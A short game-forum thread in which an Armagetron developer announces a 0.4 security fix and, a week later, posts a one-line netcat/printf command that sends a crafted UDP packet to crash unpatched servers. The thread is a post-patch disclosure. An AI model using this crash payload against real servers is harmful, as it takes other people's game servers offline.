0.4 update — Fixes a security issue

What do you want to see in Armagetron soon? Any new feature ideas? Let's ponder these ground breaking ideas...
Post Reply
User avatar
dlh
Formerly That OS X Guy
Posts: 2035
Joined: Fri Jan 02, 2004 12:05 am
Contact:
Contact dlh

0.4 update — Fixes a security issue

Post by dlh »

If you run a 0.4 server that publishes itself to a master server (TALK_TO_MASTER 1) then you should update. An attacker could cause the server to quit while it contacts a master.
Top
User avatar
Jip
Round Winner
Posts: 397
Joined: Sat Sep 26, 2009 5:32 pm

Re: 0.4 update — Fixes a security issue

Post by Jip »

Thanks for the update.
Top
User avatar
dlh
Formerly That OS X Guy
Posts: 2035
Joined: Fri Jan 02, 2004 12:05 am
Contact:
Contact dlh

Re: 0.4 update — Fixes a security issue

Post by dlh »

It's been a week, so here's the shell code to simulate a crash. You can make a 0.4 server re-publish itself to a master by entering and exiting the server when it's empty.

Code: Select all

printf "\x35\x00\x00\x00" | nc -4u -w1 <host> <port>
Top
Post Reply

Return to “Development”